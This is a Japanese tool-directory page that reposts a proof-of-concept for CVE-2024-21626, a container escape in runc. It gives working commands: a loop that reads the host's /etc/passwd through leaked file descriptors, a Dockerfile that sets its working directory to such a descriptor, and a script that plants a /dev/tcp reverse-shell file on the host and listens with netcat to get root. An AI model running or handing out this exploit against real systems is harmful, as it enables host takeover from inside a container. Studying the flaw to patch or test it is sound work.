Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-21626 — POC | Kitploit
ツール/GitHubGitHub/kubernetesbachelor/cve-2024-21626
特権昇格コンテナセキュリティ脆弱性分析エクスプロイトレッドチーミングコンテナエスケープ
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

POC

リポジトリを見る
251年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-21626

PoC

要件

runc 1.1.0 <= 1.1.11

脆弱性環境のインストール

Ubuntu 20.04 でVMをデプロイし、公式ガイドに従ってDockerをダウンロード

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

Docker内の修正された 'runc' バージョンを脆弱性のあるものに変更

runc githubリポジトリから脆弱性のあるバージョン(runc 1.1.11以前)をダウンロード: https://github.com/opencontainers/runc/releases
runc.amd64を選択(必須) runc_1111

エクスプロイトの実行

スクリプト 'verify.sh' を実行

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

verify.sh の実行で見つかった正しい fd に Dockerfile 内の作業ディレクトリを変更

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

コンテナをビルド

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

コンテナイメージを実行し、bashシェルで poc.sh を実行

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

コンテナがリスニングモードに入る

lytte

ホストマシンのルートに、/proc/self/cwd/../../../bin/ ディレクトリに 'bash.copy' という新しいスクリプトが作成されました

bash

スクリプトを実行可能にして実行すると...

root@kitploit:~
chmod +x bash.copy
./bash.copy

... ホストマシン上でルート権限のリバースシェルを取得できます

root

ソース

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

ツールをダウンロード